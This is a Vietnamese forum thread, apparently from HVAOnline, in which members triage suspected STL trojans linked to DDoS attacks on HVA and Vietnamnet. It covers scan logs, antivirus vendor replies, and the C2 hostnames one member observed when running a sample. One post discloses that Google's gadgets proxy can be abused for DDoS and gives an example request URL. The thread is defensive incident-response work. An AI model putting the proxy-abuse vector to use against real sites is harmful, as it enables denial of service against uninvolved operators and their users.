Đây là chuyện nhức nhối và đây là chuyện cần phải thay đổi tận gốc. Như em đã có lần nhận xét rằng, những vết thương ung mủ không chịu chữa trị thì dần dần sẽ dẫn đến hoại thư cho cả một cơ thể là vậy. Bịnh thành tích là hội chứng của sự mặc cảm, sự sợ hãi sự thật và thói quen che đậy. Những căn bịnh này dần dần sẽ huỷ hoại sự thật, huỷ hoại đức tính trung thực, huỷ hoại lòng dũng cảm đối diện với thiếu sót để thay đổi và phát triển. Đây không phải là chuyện đùa nữa rồi.
Điều này lằm tôi rất buồn . Làm thế nào mà thay đổi tận gốc được đây . Không nhẽ bảo tôi tự chặt chân mình đi à ? Cái điều tôi sợ nhất là phải nhổ cái cây ấy đi và trồng cây khác . Lại đau đầu .

Vấn đề nằm ở chỗ chấp nhận để cái cây ấy sống dở, chết dở, đang bị ung rữa dần dần để rồi một lúc nào đó nó sẽ ngã nhào hay là đốn cái cây đã bị bệnh nặng ấy đi để trồng cây khác hay không thôi. Bạn chặt chân bạn hoàn toàn khác việc bạn chặt một cái cây bị ung hoại. Bạn đau đầu vì thấy cái cây ấy đang ung rữa hơn là bạn đau đầu vì phải chặt cái cây đang bị ung rữa? Nếu bạn thấy việc chặt nó đau đầu hơn là việc ngồi nhìn nó ung rữa thì đừng chặt.

Phân tích tính chất vài trận DDoS HVA vừa qua.

Iwwaty — GMT

Anh bozalno_1989 xem hộ em log này với, em đã scan theo hướng dẫn của anh. http://www.mediafire.com/?l34farrkbldu7av

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Iwwaty wrote:

Anh bozalno_1989 xem hộ em log này với, em đã scan theo hướng dẫn của anh. http://www.mediafire.com/?l34farrkbldu7av

Nhìn vô là thấy ngay mấy ông này: "C:\Program Files (x86)\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe" c:\windows\system32\themeservice.dll c:\windows\system32\drivers\netaapl64.sys c:\program files (x86)\ati technologies\ati.ace\core-static\atiacm64.dll c:\program files\common files\ati technologies\multimedia\atimpenc64.dll Bồ upload mấy ông này lên xem sao?

Phân tích tính chất vài trận DDoS HVA vừa qua.

thinh191 — GMT

Sáng nay ghost lại bản ghost win XP để test thử thì thấy AV báo phát hiện: file:G:\WINDOWS\GoogleCrashHandler.exe Trojan:Win32/Sisron từ trước đến giờ vẫn dùng bản ghost này mà ko thấy báo, hoá ra nó nằm ở trong bản ghót này lâu ròi

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

thinh191 wrote:

Sáng nay ghost lại bản ghost win XP để test thử thì thấy AV báo phát hiện: file:G:\WINDOWS\GoogleCrashHandler.exe Trojan:Win32/Sisron từ trước đến giờ vẫn dùng bản ghost này mà ko thấy báo, hoá ra nó nằm ở trong bản ghót này lâu ròi

Bồ coi thử created date của con này là ngày tháng năm nào vậy?

Phân tích tính chất vài trận DDoS HVA vừa qua.

Iwwaty — GMT

conmale wrote:

Iwwaty wrote:

Anh bozalno_1989 xem hộ em log này với, em đã scan theo hướng dẫn của anh. http://www.mediafire.com/?l34farrkbldu7av
Nhìn vô là thấy ngay mấy ông này: "C:\Program Files (x86)\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe" c:\windows\system32\themeservice.dll c:\windows\system32\drivers\netaapl64.sys c:\program files (x86)\ati technologies\ati.ace\core-static\atiacm64.dll c:\program files\common files\ati technologies\multimedia\atimpenc64.dll Bồ upload mấy ông này lên xem sao?

Chào anh Conmale, Cảm ơn anh đã quan tâm đến em, đây là những file anh yêu cầu. http://www.mediafire.com/?ba9ugwab9ec70je File Adobelmsvc.exe em không upload được vì tối qua em đã uninstall toàn bộ những gì liên quan đến Adobe ( trừ flash plugin ) rồi nên file này không còn tồn tại nữa. Chúc anh và mọi người có 1 ngày tốt lành.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

2 thinh191: Cậu up lên mediafire file GoogleCrashHandler.exe đó được không ? Thằng này nhiều biến thể lắm (như AcrobatUpdater.exe vậy). 2 Iwwaty: An tâm, toàn là file PE-64bit hết, stl chưa code "meo que" cho Win64 đâu, ít khán giả lắm ! Kaspersky đã reply cho em:

IAStorCommon.dll, IAStorDataMgr.dll, IAStorUIHelper.dll, iTunesHelper-tray.exe_, SmartPin.dll, SysInftLib.dll No malicious code were found in these files. IAStorDataMgrSvc.exe- Trojan-Downloader.Win32.Agent.tbhb New malicious software was found in these files. Detection will be included in the next update. Thank you for your help. ituneshelper.exe_ - Trojan.Win32.Diple.acxu k113.css - Backdoor.Win32.Agent.bqwm ....................... ....................... Regards, Dmitry Kirsanov Virus Analyst, Kaspersky Lab.

Cái đống dll đi kèm của IAStor nó cứ khăng khăng với em là file sạch. Vậy cũng không sao, vì nếu IAStorDataMgrSvc.exe bị thịt rồi thì cái đống dll đó vô dụng.

Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo — GMT

Đến ngày hôm nay thì IAStore_26_08_2011.zip mới bị duy nhất một trình AV phát hiện có virus, còn các trình AV khác chưa phát hiện được. Mình mới test qua VirusTotal và Jotti.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Iwwaty wrote:

conmale wrote:

Iwwaty wrote:

Anh bozalno_1989 xem hộ em log này với, em đã scan theo hướng dẫn của anh. http://www.mediafire.com/?l34farrkbldu7av
Nhìn vô là thấy ngay mấy ông này: "C:\Program Files (x86)\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe" c:\windows\system32\themeservice.dll c:\windows\system32\drivers\netaapl64.sys c:\program files (x86)\ati technologies\ati.ace\core-static\atiacm64.dll c:\program files\common files\ati technologies\multimedia\atimpenc64.dll Bồ upload mấy ông này lên xem sao?
Chào anh Conmale, Cảm ơn anh đã quan tâm đến em, đây là những file anh yêu cầu. http://www.mediafire.com/?ba9ugwab9ec70je File Adobelmsvc.exe em không upload được vì tối qua em đã uninstall toàn bộ những gì liên quan đến Adobe ( trừ flash plugin ) rồi nên file này không còn tồn tại nữa. Chúc anh và mọi người có 1 ngày tốt lành.

Ông nội Adobelmsvc.exe là đáng ngờ nhất mà bồ đã cho nó đi rồi thì đành chịu. Ông nội themeservice.dll cũng có những biểu hiện khá đáng ngờ nhưng thiếu đầu, thiếu đuôi thì cũng khó xác định được.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Tới ngày hôm nay, ngoài Avira hồi báo và cập nhật nhanh nhất, tóm hết 100%, thì lần lượt có các reply sau: 1. Symantec: thất vọng ông này nhất, vẫn dùng hệ thống phân tích tự động, báo về là clean hết. 2. Sophos: Chỉ bắt đám iTunes*.exe và k113.cs, còn trọn bộ IAStor thì clean 3. AVG: cũng như Sophos. 4. Fortinet: cũng như AVG và Sophos 5. Kaspersky: tôi đã post ở trên. 6. MS + McAfee + FSecure....: chưa có kết quả. Quan trọng nhất theo tôi là Avira, Kaspersky và MS. Vì theo tôi, đây là 3 AV phổ biến nhất ở VN ta, ngoài CMC và BKAV. Windows Defender, MSE thì hầu như máy nào cài Vista hay Win7 đều có, nhưng sợ là bà con không cập nhật hay cập nhật không được vì xxx. Bà con nào đang dùng Windows Defender, MSE mà không auto update được, nên chịu khó lên homepage của Windows Defender, download bản database update về: http://www.microsoft.com/security/portal/Definitions/ADL.aspx#top

Phân tích tính chất vài trận DDoS HVA vừa qua.

Iwwaty — GMT

Máy em có cài KIS update thường xuyên và dùng 64bit nên chắc cũng không đáng ngại. Dạo này máy có mấy triệu chứng lạ nên post lên nhờ các anh kiểu tra hộ. Cảm ơn anh Conmale và anh TQN đã quan tâm.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

RCE = Reverse Code Engineering: kỹ thuật đão ngược, hay dịch ngược. Là một mãng trong RE: Reverse Engineering. RE gồm rất nhiều mãng con: hardware, firmware, code (software). Nói nôm na, tháo rời một cái máy ra, xem nó được chế tạo ra sao, lắp ráp và vận hành ra sao cũng là RE, nhưng đây là RE hardware, máy móc. TQ ăn cắp công nghệ máy bay, tàu chiến của nước ngoài, cũng 1 phần dùng RE. Kinh nghiệm của em: tháo thì dể, nhưng lắp lại cho đúng, không dư bù lon ốc vít, chạy được thì khó. Vì vậy em chọn RE code, software ;)

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Để các bạn tìm được link, mail để upload virus, malware, tui xin post link này: http://www.mywot.com/wiki/Malware_submission Hiện tại tôi cũng theo trang này mà up mẫu thôi, chịu khó đi từ trên xuống dưới. Không biết có ai ở Vietnamnet đang đọc bài không, có thể cho anh em HVA và mọi người biết tình hình DDOS vào Vietnamnet có giãm đi chưa ! Tôi nghĩ là giãm đáng kể rồi vì hầu hết các AV đã cập nhật iTunesHelper*.exe và kill nó.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Iwwaty wrote:

Máy em có cài KIS update thường xuyên và dùng 64bit nên chắc cũng không đáng ngại. Dạo này máy có mấy triệu chứng lạ nên post lên nhờ các anh kiểu tra hộ. Cảm ơn anh Conmale và anh TQN đã quan tâm.

Không hẳn đâu em. Dòng Windows XP trở lên dùng 64-bit vẫn có khả năng backward compatible với 32-bit. Bởi vậy 32-bit apps (và malware) vẫn có thể tấn công như thường. Cách dễ nhất để thu hẹp phạm vi nguyên nhân các triệu chứng lạ là nên dùng portmon và processmon http://technet.microsoft.com/en-us/sysinternals/bb896644) để theo dõi xem cái gì đi vô, đi ra máy mình. Từ đó xác định được processes / binaries nào có khả năng là nguyên nhân tạo "triệu chứng lạ". Nếu bà con tìm thấy được những triệu chứng lạ và có thể thu thập thông tin đồng thời cung cấp luôn nguồn gốc của những chương trình "lạ" ấy từ đâu ra thì càng tốt (ví dụ: vừa cài thêm soft download ở xyz..., vừa mở file đính kèm từ email...).

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Kết quả quét iTunesHelper.exe với VirusTotal, đã force reanalyze lại: http://www.virustotal.com/file-scan/report.html?id=aa94d29cbe97b61e9200b52f540dfed24e3f8321de0960824a041141452d34ec-1314858850 Hơn một nữa AV đã tóm cổ em nó.

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

Hi Iwwaty, anh conmale đã xem cho bạn rồi nhé ;) .

conmale wrote:

Iwwaty wrote:

Máy em có cài KIS update thường xuyên và dùng 64bit nên chắc cũng không đáng ngại. Dạo này máy có mấy triệu chứng lạ nên post lên nhờ các anh kiểu tra hộ. Cảm ơn anh Conmale và anh TQN đã quan tâm.
Không hẳn đâu em. Dòng Windows XP trở lên dùng 64-bit vẫn có khả năng backward compatible với 32-bit. Bởi vậy 32-bit apps (và malware) vẫn có thể tấn công như thường. Cách dễ nhất để thu hẹp phạm vi nguyên nhân các triệu chứng lạ là nên dùng portmon và processmon http://technet.microsoft.com/en-us/sysinternals/bb896644) để theo dõi xem cái gì đi vô, đi ra máy mình. Từ đó xác định được processes / binaries nào có khả năng là nguyên nhân tạo "triệu chứng lạ". Nếu bà con tìm thấy được những triệu chứng lạ và có thể thu thập thông tin đồng thời cung cấp luôn nguồn gốc của những chương trình "lạ" ấy từ đâu ra thì càng tốt (ví dụ: vừa cài thêm soft download ở xyz..., vừa mở file đính kèm từ email...).

Tiếc là Portmon không hỗ trợ Windows 64-bit.

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

THẢO LUẬN THÊM VỀ IAStorDataMgrSvc.exe FILE 1- Bạn 1visao gần đây có upload lên Mediafire một file .rar có tên là "IAStore_26_08_2011" và nhờ HVA kiểm tra xem các file .dll và .exe trong file này có phải là virus-trojan của STL không? Anh TQN đã RCE và phân tích file này, bài viết trong topic. Xin các bạn tham khảo. 2- File (process) IAStorDataMgrSvc.exe là một Chipset sofware của Intel, tên là Intel(R) Rapid Storage Technology. Phần mềm này download tai downloadcenter.intel.com (File iata_enu_10.6.0.1022.exe, dung lương khoảng 7 MB). Intel(R) Rapid Storage Technology soft. hỗ trợ cho nhiều Dell Desktop khi áp dụng RAID 5-10 và cũng hỗ trợ RAID 0, 1, AHCI & Matrix RAID trong một số Dell desktop và cho các mobile platforms. Intel đôi lúc gọi soft này là một "driver". Như vậy Intel(R) Rapid Storage Technology (mà IAStorDataMgrSvc.exe nằm trong nó), liên quan nhiều đến Dell hardware. Từ đó ta thấy soft này không phổ biến và số người sử dụng nó chắc không nhiều. 3- Khi cài đặt (tôi đã cài thử Intel(R) Rapid Storage Technology vào máy mình) thì service-process IAStorDataMgrSvc.exe nằm ở 2 thư mục sau: C:/Program Files/Intel/Intel(R) Rapid Storage Technology/IAStorDataMgrSvc.exe và C:/WINDOWS/system 32/. Vì vậy nếu phát hiện IAStorDataMgrSvc.exe nằm ở các thư mục khác thì nó có thể là một virus hay Trojan. Nhiệm vụ của IAStorDataMgrSvc.exe (origin file) theo tôi đại thể là khi khởi đông nó kích hoạt hàng loạt file .dll (giống như trường hợp của iTunesHelper.exe-origine trong iTunes 10.4 chẳng hạn, không phải là malicious iTunesHelper.exe) và "sắp xếp" chúng theo một sơ đồ tiến độ đã định để máy tính hoạt động nhanh và hiệu quả nhất. Vì vậy nó đóng một vai trò khá quan trọng trong hệ thống. Vả lại những software liên quan và điều khiển hardware như SCSI Adapter, RAID... thường khá phức tạp. 4- Trong quá khứ (cách đây từ vài năm) nhiều hiện tượng process IAStorDataMgrSvc.exe bị hư hỏng (error) hay sai sót (corruption) thường được báo cáo cho Intel. Có một số trường hơp phát hiện process này bị nhiễm virus. Khi IAStorDataMgrSvc.exe bị hư hỏng thì máy có hiện tượng chạy châm (do IAStorDataMgrSvc.exe chiếm một tỷ lệ cao trong năng lưc CPU được sử dụng, có khi đến 80-90%), máy hay restart.... Khi bị nhiễm virus, máy có những kết nôi đến các website lạ (của hacker) và trang default của trình duyệt hay bị thay đổi.... 5- Tôi vừa thử nghiêm kích hoạt malicious IAStorDataMgrSvc.exe (nằm trong file do bạn 1visao cung cấp) trên máy của mình để kiểm tra. Những hiện tương sau đây được xác nhận sau khi đã kiểm chứng nhiều lần: - Không có bất cứ một cuộc tấn công DDoS nào đươc thưc hiện từ máy của tôi. Tất nhiên là không có cuộc tấn công DDoS vao vietnamnet. Malicious IAStorDataMgrSvc.exe trong trường hơp này (từ ban 1visao cung cấp) không phải là một DDoS tool. - IAStorDataMgrSvc.exe thường xuyên khời phát quá trình kết nôi với 3 website và một IP address như sau:

easy.lixns.com (119.153.92.129)-webserver đặt tai Pakistan direct.fqin.net (119.153.92.110) -webserver đặt tai Pakistan find.laxt.net (74.115.79.191) -webserver đặt tai Mỹ IP: 239.255.255.250

Khi check vào các website-webserver này thì thấy chỉ có webserver direct.fqin.net là active (nối mạng) còn 3 cái còn lại thì inactive-offline. Có vài đăc điểm: - Khi check webserver direct.fqin.net thấy nó mở 3 cổng 21, 23 và 80, thấy một server tên là RomPager/4.07 UPnP/1.0 (đây là 1 software của ZyXEL router- như vậy hacker có thể đang dùng router để Remote access vào một máy mục tiêu, thông qua Telnet) thay vì NGINX như lãnh đạo STL thường làm - Các webserver này chỉ hosting một website, như đã thông kê trên đây. 6- Kết luận IAStorDataMgrSvc.exe do ban 1 visao cung cấp không phải là một DDoS tool, càng không phải là một DDoS tool tấn công vào vietnamnet. Nhưng đó là một Malicious IAStorDataMgrSvc.exe . Nó chắc không phải là một "sản phẩm " (mèo què- như anh TQN hay gọi) của lãnh đạo STL. Nó có thể của các hacker khác, thí dụ Pakistan hacker chẳng hạn.

Phân tích tính chất vài trận DDoS HVA vừa qua.

bula87 — GMT

Anh bozalno_1989 xem giúp mình các file LOG này với, mình đã làm theo hướng dẫn của bạn nhưng phần log Autorunsc mình làm rồi mà ko được, chả biết vì lý do gì nữa... link file LOG http://www.mediafire.com/?kaxowfeyf4409r0

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

bula87, bạn chú ý là cần tắt tất cả các trình duyệt khi scan để lấy log TCPView. Bạn tìm các file log sau trong máy của bạn và gửi lên cho mình: autorunsc_result.txt, autorunsc_result.csv .

Phân tích tính chất vài trận DDoS HVA vừa qua.

TMT102 — GMT

conmale wrote:

TMT102 wrote:

Đây là chuyện nhức nhối và đây là chuyện cần phải thay đổi tận gốc. Như em đã có lần nhận xét rằng, những vết thương ung mủ không chịu chữa trị thì dần dần sẽ dẫn đến hoại thư cho cả một cơ thể là vậy. Bịnh thành tích là hội chứng của sự mặc cảm, sự sợ hãi sự thật và thói quen che đậy. Những căn bịnh này dần dần sẽ huỷ hoại sự thật, huỷ hoại đức tính trung thực, huỷ hoại lòng dũng cảm đối diện với thiếu sót để thay đổi và phát triển. Đây không phải là chuyện đùa nữa rồi.
Điều này lằm tôi rất buồn . Làm thế nào mà thay đổi tận gốc được đây . Không nhẽ bảo tôi tự chặt chân mình đi à ? Cái điều tôi sợ nhất là phải nhổ cái cây ấy đi và trồng cây khác . Lại đau đầu .
Vấn đề nằm ở chỗ chấp nhận để cái cây ấy sống dở, chết dở, đang bị ung rữa dần dần để rồi một lúc nào đó nó sẽ ngã nhào hay là đốn cái cây đã bị bệnh nặng ấy đi để trồng cây khác hay không thôi. Bạn chặt chân bạn hoàn toàn khác việc bạn chặt một cái cây bị ung hoại. Bạn đau đầu vì thấy cái cây ấy đang ung rữa hơn là bạn đau đầu vì phải chặt cái cây đang bị ung rữa? Nếu bạn thấy việc chặt nó đau đầu hơn là việc ngồi nhìn nó ung rữa thì đừng chặt.

Nói về triết lý comale chưa hiểu hết tôi rồi . " Không nhẽ bảo tôi tự chặt chân mình đi à ? " không phải nói tôi mà nói cái kiến trúc thượng tầng được hình thành bởi cái gốc đó . Nó không thể tự khai tử nó được ! Nhưng để thay đổi nó mình phải làm như thế nào đây ? Tôi cũng là hạng vô danh tiểu tốt ( như trong IT vậy ) nhưng đó là lý tưởng của tôi . Dù là nhỏ nhất tôi cũng sẽ thay đổi nó . Thay đổi cái không hợp lý đã được mọi người "thích nghi " và biến nó thành hợp lý ! Vài dòng tâm sự ngoài lề .Các bác đừng có xoá nick em nha .

Phân tích tính chất vài trận DDoS HVA vừa qua.

TMT102 — GMT

oh . Xin lỗi nhớ nhầm tên bác . Conmale !

Phân tích tính chất vài trận DDoS HVA vừa qua.

thuypv — GMT

Tình hình là rất tình hình, đến bây giờ vietnamnet.vn vẫn ko thể vào được Hem biết vietnamnet đang tiến hành khắc phục như thế nào mà chậm vậy, hay là chịu chết Bác Tử Quảng đầu trọc hay ho he đâu rồi mà sao vụ này ko thấy ý kiến ý cỏ gì nhỉ, chán thật, vụ bên Hàn Xẻng xa xôi mà bác ấy còn truy lùng được sao vụ này kém thế

Phân tích tính chất vài trận DDoS HVA vừa qua.

ga_cum06 — GMT

Xin admin và các anh em chú ý : hiện nay đang có 1 lỗi của Google có thể khai thác lợi dụng server của google để DDos, lỗi em đã thông báo tại đây : /hvaonline/posts/list/39969.html đến sáng nay khi get : https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=/hvaonline/posts/list/39969.html&container=focus có trả về file p.txt em upload : http://www.mediafire.com/?uj6xngk695buxvx rõ ràng hva vẫn chưa chặn kiểu tấn công này

Phân tích tính chất vài trận DDoS HVA vừa qua.

mylove14129 — GMT

thuypv wrote:

Tình hình là rất tình hình, đến bây giờ vietnamnet.vn vẫn ko thể vào được Hem biết vietnamnet đang tiến hành khắc phục như thế nào mà chậm vậy, hay là chịu chết Bác Tử Quảng đầu trọc hay ho he đâu rồi mà sao vụ này ko thấy ý kiến ý cỏ gì nhỉ, chán thật, vụ bên Hàn Xẻng xa xôi mà bác ấy còn truy lùng được sao vụ này kém thế

Bạn xem lại mạng của mình xem nhé. Ngày nào mình cũng vào vietnamnet bình thường mà? Theo mình nhớ không nhầm thì chỉ có 2 3 hôm trùng với thời điểm hva bị tấn công là vietnamnet khó vào thôi. Từ đó đến nay mình vào rất tốt mà? Tốc độ khá nhanh

Phân tích tính chất vài trận DDoS HVA vừa qua.

crc32 — GMT

mylove14129 wrote:

Bạn xem lại mạng của mình xem nhé. Ngày nào mình cũng vào vietnamnet bình thường mà? Theo mình nhớ không nhầm thì chỉ có 2 3 hôm trùng với thời điểm hva bị tấn công là vietnamnet khó vào thôi. Từ đó đến nay mình vào rất tốt mà? Tốc độ khá nhanh

Cả tuần nay mình vào báo điện tử Vietnamnet.vn cũng không được.

Phân tích tính chất vài trận DDoS HVA vừa qua.

Iwwaty — GMT

Mình cũng không vào được. - Hiện mình đang dùng mạng FPT. - Vì ở nhà trọ nên có nhiều người dùng chung. Theo mình nghĩ thì một trong những máy tính trong khu trọ của mình nhiễm "mèo què" của STL và máy tính đó tiến hành attack Vietnamnet dẫn đến VNN block ip của mình.

Phân tích tính chất vài trận DDoS HVA vừa qua.

mylove14129 — GMT

Mình dùng mạng của VDC và viettel(3g) thấy vào tốc độ ầm ầm :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

TMDTHBC — GMT

mylove14129 wrote:

Mình dùng mạng của VDC và viettel(3g) thấy vào tốc độ ầm ầm :D

Uhm đúng thế, mình sử dụng internet cáp SCTV, khoảng 3 bữa nay tốc độ load rất tốt, chỉ có vietnamnet bỏ hẳn link của tuanvietnam ra khỏi trang chính của mình thôi.

Phân tích tính chất vài trận DDoS HVA vừa qua.

thuypv — GMT

Tình hình là rất tình hình nếu đánh là: www.vietnamnet.vn thì vào vô tư, còn uýnh là: vietnamnet.vn như hàng ngày em hay gõ thì ko vào được, đợi cả nửa tiếng có lẽ vietnamnet chưa check lại dns cái này

Phân tích tính chất vài trận DDoS HVA vừa qua.

Dpm — GMT

@thuyvn: chuẩn. www.vietnamnet.vn có IP 123.30.184.10,còn vietnamnet.vn có IP 117.103.197.249,có lẽ 123.30.184.10 chính là backend của vnn luôn,chạy IIS 7.5,và 117.103.197.249 là reverse proxy chạy squid. còn imgs.vietnamnet.vn thì nhiều vô số :203.162.71.69,203.162.71.74,203.162.71.75,123.30.184.3,203.162.71.68,và res.vietnamnet.vn nữa: 123.30.184.3,203.162.71.68,203.162.71.69.mấy server này cho ảnh và các file tĩnh(js,css..),có server chạy squid,srv chạy nginx,srv chạy varnish..nhiểu phết nhỉ,vnn lớn quá :D. Trên IP 123.30.184.10 không thực hiện việc check sự tồn tại của cookie,nên k có cookie của trang vnn vẫn vào đc,ngược lại với IP 117.103.197.249 sẽ kiểm tra xem có cookie hay không,nếu không có thì khỏi cần vào làm gì,muốn vào thì vào add cookie hoặc qa www.

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

bula87 wrote:

Anh bozalno_1989 xem giúp mình các file LOG này với, mình đã làm theo hướng dẫn của bạn nhưng phần log Autorunsc mình làm rồi mà ko được, chả biết vì lý do gì nữa... link file LOG http://www.mediafire.com/?kaxowfeyf4409r0

Mình vừa cập nhật hướng dẫn scan và gửi log Autorunsc, bạn thực hiện lại theo hướng dẫn nhé: Hướng dẫn scan và gửi log Autorunsc (Autoruns command-line) http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autorunsc-(autoruns-command-line)/

Phân tích tính chất vài trận DDoS HVA vừa qua.

bula87 — GMT

bolzano_1989 wrote:

bula87 wrote:

Anh bozalno_1989 xem giúp mình các file LOG này với, mình đã làm theo hướng dẫn của bạn nhưng phần log Autorunsc mình làm rồi mà ko được, chả biết vì lý do gì nữa... link file LOG http://www.mediafire.com/?kaxowfeyf4409r0
Mình vừa cập nhật hướng dẫn scan và gửi log Autorunsc, bạn thực hiện lại theo hướng dẫn nhé: Hướng dẫn scan và gửi log Autorunsc (Autoruns command-line) http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autorunsc-(autoruns-command-line)/

Mình đã làm theo hướn dẫn của bolzano_1989, bạn xem giúp mình nhé link file LOG Code:

http://www.mediafire.com/?99de4x8bgb4b48c

thanks

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

bula87, bạn tắt cửa sổ cmd (màu nền đen) khi việc scan chưa hoàn tất nên file log autorunsc_result.csv chưa được ghi xong, bạn thực hiện lại nhé.

Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo — GMT

http://www.ttxva.org/bao-dong-do-hackers-cay-ma-mo-web-cam-thau-hinh-tu-dong-gui-ve-cho-cong-an-mang/ Cái này có liên quan tới STL không?

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

Thấy bên blog Ba Sàm có đoạn sau, ai có mẫu virus này xin vui lòng gửi cho mình và HVA. http://anhbasam.wordpress.com/2011/06/10/

- Độc giả NT loan báo: Xin quý vị cẩn thận với email có địa chỉ “Nam Hoang”. Nếu mở file ra xem máy sẽ bị dính virus ngay. Có thể bị mất password email và các blogs, các accounts khác nếu chúng thâm nhập vào máy mình. Đã reported Google để họ xếp vào email tin tặc. Không nên mở email nào có dạng .rar Tập tin đính kèm: Can canh tau ngu chinh TQ.rar Kích thước: 512,221 bytes . Khi giải nén sẽ cho ra những hình ảnh sau đây: trong số đó, tập tin “001 – Tau ngu chinh 303 – Pha hoaics.jpg” không phải là hình mà là dạng screen saver (một loại executable). Nếu bấm mở tập tin đó lên sẽ bị dính mã độc.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TMDTHBC — GMT

@ Hi Mr. bolzano_1989, Kiểm tra giúp mình file scanlog nhé, nếu được thì vui lòng hướng dẫn cách kiểm tra (đọc) autorunlog file. Cảm ơn. http://www.mediafire.com/download.php?lj3597tss2op48q

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

TMDTHBC, bạn chưa gửi log Autoruns: Hướng dẫn scan và gửi log Autoruns http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autoruns/

Phân tích tính chất vài trận DDoS HVA vừa qua.

TMDTHBC — GMT

bolzano_1989 wrote:

TMDTHBC, bạn chưa gửi log Autoruns: Hướng dẫn scan và gửi log Autoruns http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autoruns/

Mình gửi lại log autoruns. http://www.mediafire.com/?derlj34eeq7edp8 Thanks very much.

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

TMDTHBC, log của bạn bình thường, tôi không thấy dấu hiệu bị lây nhiễm virus nào cả, bạn có gặp dấu hiệu nào đặc thù cho việc bị lây nhiễm virus máy tính ở máy của bạn không? Bạn có thể tham khảo bài viết sau của mình: Một số hiện tượng đặc trưng biểu hiện máy tính bị lây nhiễm virus máy tính http://support.cmclab.net/vn/tut0rial/mot-so-hien-tuong-dac-trung-bieu-hien-may-tinh-bi-lay-nhiem-virus-may-tinh/

Phân tích tính chất vài trận DDoS HVA vừa qua.

TMDTHBC — GMT

bolzano_1989 wrote:

TMDTHBC, log của bạn bình thường, tôi không thấy dấu hiệu bị lây nhiễm virus nào cả, bạn có gặp dấu hiệu nào đặc thù cho việc bị lây nhiễm virus máy tính ở máy của bạn không? Bạn có thể tham khảo bài viết sau của mình: Một số hiện tượng đặc trưng biểu hiện máy tính bị lây nhiễm virus máy tính http://support.cmclab.net/vn/tut0rial/mot-so-hien-tuong-dac-trung-bieu-hien-may-tinh-bi-lay-nhiem-virus-may-tinh/

Mình có download file dic dùng dò pass wifi, load xong, bung nén compile thì thấy máy chạy chậm hẳn. Đã kiểm tra bằng ms essential, tcpview, proc mon thì không phát hiện gì. Hiện tượng trên vẫn còn nên nhờ Mr. bolzano check giúp. Nếu có phát hiện gì mới mình sẽ cần bạn giúp đỡ. thanks

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

Vấn đề chậm máy của bạn không phải do virus gây ra đâu ;) .

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Thật sự là em quá thất vọng về mấy coder của anh em stl quá. Chống lại RCE của em và các anh em khác bằng những kỹ thuật quá ấu trĩ , sơ đẵng, ngây thơ và buồn cười, tệ hết chổ nói, làm em phát bực luôn. Detect AV chỉ một mình AVG thôi sao. Trên thế giới này biết bao nhiêu là AVs. Chống lại DecodeBin.1sc của em chỉ vậy thôi à, 5 phút thôi là em có DecodeBin2.1sc khác ! Lần này lại chơi trò delete file .idb của IDA nữa. Quá tệ, quá sơ đẵng trong suy nghĩ. Nếu em save file .idb ở thư mục khác thì sao ? Đề nghị anh em stl tập dùng IDA đi ? Mình phải hiểu đối thủ thì mới chống lại được chứ. Liệu mấy anh có đủ sức,đủ trình độ anti mọi decompiler, diassembler, mọi tool RCE không ? Về code và RCE, cả tập thể mấy anh không thể nào chống lại em nổi đâu, không ai là đối thủ của em đâu. Nhớ một điều vậy nhé. Em chỉ là một newbie, một tay mơ, nữa mùa trong giới RCE Vietnam thôi, còn hàng trăm, hàng ngàn cao thủ đích thực khác nữa mà các anh không biết đấy.

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

TQN wrote:

Thật sự là em quá thất vọng về mấy coder của anh em stl quá. Chống lại RCE của em và các anh em khác bằng những kỹ thuật quá ấu trĩ , sơ đẵng, ngây thơ và buồn cười, tệ hết chổ nói, làm em phát bực luôn. Detect AV chỉ một mình AVG thôi sao. Trên thế giới này biết bao nhiêu là AVs. Chống lại DecodeBin.1sc của em chỉ vậy thôi à, 5 phút thôi là em có DecodeBin2.1sc khác ! Lần này lại chơi trò delete file .idb của IDA nữa. Quá tệ, quá sơ đẵng trong suy nghĩ. Nếu em save file .idb ở thư mục khác thì sao ? Đề nghị anh em stl tập dùng IDA đi ? Mình phải hiểu đối thủ thì mới chống lại được chứ. Liệu mấy anh có đủ sức,đủ trình độ anti mọi decompiler, diassembler, mọi tool RCE không ? Về code và RCE, cả tập thể mấy anh không thể nào chống lại em nổi đâu, không ai là đối thủ của em đâu. Nhớ một điều vậy nhé. Em chỉ là một newbie, một tay mơ, nữa mùa trong giới RCE Vietnam thôi, còn hàng trăm, hàng ngàn cao 